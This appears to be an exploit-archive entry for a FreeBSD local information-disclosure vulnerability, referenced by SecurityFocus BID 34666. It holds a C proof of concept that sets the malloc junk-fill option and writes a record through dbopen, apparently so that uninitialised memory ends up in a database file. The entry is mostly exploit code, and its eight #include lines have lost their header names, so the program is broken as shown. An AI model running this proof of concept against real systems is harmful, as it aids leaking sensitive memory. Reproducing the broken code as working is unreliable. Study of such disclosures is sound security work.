// source: https://www.securityfocus.com/bid/34666/info FreeBSD is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. #include #include #include #include #include #include #include #include int main() { const char data[] = "abcd"; DB *db; DBT dbt; /* * Set _malloc_options to "J" so that all memory obtained from * malloc(3) is iniatialized to 0x5a. See malloc(3) manual page * for additional information. */ _malloc_options = "J"; db = dbopen("test.db", O_RDWR | O_CREAT | O_TRUNC, 0644, DB_HASH, NULL); if (db == NULL) err(1, "dbopen()"); dbt.data = &data; dbt.size = sizeof(data); if (db->put(db, &dbt, &dbt, 0) != 0) err(1, "db->put()"); db->close(db); return (0); }